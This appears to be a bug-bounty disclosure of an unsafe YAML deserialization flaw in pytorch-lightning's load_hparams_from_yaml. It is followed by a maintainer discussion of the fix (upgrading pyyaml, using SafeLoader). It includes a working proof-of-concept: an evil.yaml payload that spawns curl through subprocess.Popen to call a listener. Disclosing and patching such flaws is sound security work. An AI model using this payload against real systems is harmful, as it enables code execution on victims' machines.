Deserialization of Untrusted Data in pytorchlightning/pytorch-lightning
Reported on
Dec 12th 2021
Description
There is untrusted YAML Deserialization vulnerability on PyTorchLightning Github repository. PyTorchLightning's saving.py (core.saving.load_hparams_from_yaml) functionality is calling "yaml.UnsafeLoader" from pyyaml Python library which is not secure method. Because of that, maliciously crafted yaml config file can cause code execution on the victim's machine.
Proof of Concept
- Here is the poc.py file:
from pytorch_lightning import core
core.saving.load_hparams_from_yaml("evil.yaml")
- Here is the evil.yaml file:
- !!python/object/new:yaml.MappingNode
listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "127.0.0.1:8080/rce"]]'
state:
tag: !!str dummy
value: !!str dummy
extend: !!python/name:yaml.unsafe_load
- After that, you need to start HTTP server on your attacker machine's port 8080. When you run the below command, you will see the HTTP request from the victim host because of the malicious yaml file.
python3 -m http.server 8080
- Run the poc.py file after that you will see HTTP request from coming the victim host,
python3 poc.py
Impact
Maliciously crafted yaml config file can cause code execution on the victim's machine.
Occurrences
References
SECURITY.md
a year ago
As mentioned in the reference link, is the fix just updating https://github.com/PyTorchLightning/pytorch-lightning/blob/7aee00c679d64ed62c0e119415ac3e02a0e434fb/requirements.txt#L7 to >=5.3.1?
Actually, I don't have very deep knowledge about the pyyaml library, but I would recommend you to update the library to the latest version rather than the 5.3.1 version because as you can see from this link, it is said that there may be some problems in the 5.3.1 version. In addition, the use of UnsafeLoder may also open the door to different deserilization vulnerabilities in the future. For this reason, I can recommend you to examine other pyyaml loader functions such as FullLoader and SafeLoader. As the name suggests, if your application will not cause any incompatibility problems, using "yaml.SafeLoader" after updating the pyyaml library seems like the most guaranteed solution.
Another reference about this subject: https://blog.ankursundara.com/pyyaml-cve/
Okay, thank you! Do you want to open a PR so you get the fix bounty?